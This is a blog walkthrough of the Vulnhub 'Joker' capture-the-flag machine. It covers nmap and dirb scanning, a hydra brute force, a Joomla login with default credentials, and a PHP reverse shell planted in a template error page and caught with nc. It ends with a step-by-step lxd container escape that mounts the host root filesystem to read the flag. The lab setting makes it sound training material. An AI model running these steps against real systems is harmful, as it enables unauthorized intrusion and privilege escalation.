Vulnhub Joker Walkthrough

Start scanning the host with nmap –A –T4 –p- 192.168.1.13 –vv

Scan it again but with dirb

I downloaded all the pictures from the /img path and found that picture 100.jpg have some information encrypted in it but it needs a password , steghide extract –sf 100.jpg

So I tried something else for now and went to brute force port 8080 with hydra using the username joker and rockyou.txt file as the password list .

Now the site is running joomla service in which the login page is located at http://192.168.1.13:8080/administrator/ and joomla:joomla to login ( google it )

Then I tried to upload a php shell into the media section but didn’t work even uploading a pic didn’t work

So I kept poking around till I found in the settings php is enabled in the templates section, so let’s modify a page with our php shell and save it, it’s better to modify the error page as you don’t mess up the site or something (been there before )

Then navigate to the address 192.168.1.13:8080/templates/beez3/error.php while you have a listening port with nc on your machine.

Id and you can see the host is lxd vulnerable, so now we need to priv escalation using the lxd exploit, now do as I say step by step to get this done:

First of all download this file from github to your machine and build it : https://github.com/saghul/lxd-alpine-builder

Cd to the folder and run ./build-alpine

Then you will get a tar file copy it to the host using wget http://192.168.1.13/alpine-v3.11-x86_64-20200130_1501.tar.gz , and of course make a python –m SimpleHTTPServer 80 , on your machine

Now write these commands in order :

lxc image import ./alpine-v3.11-x86_64-20200130_1501.tar.gz –alias hacker

lxc image list

lxc init hacker mycontainer -c security.privileged=true

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

lxc list

lxc start mycontainer

lxc exec mycontainer /bin/sh

Then navigate to /mnt/root/root , then cat final.txt

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s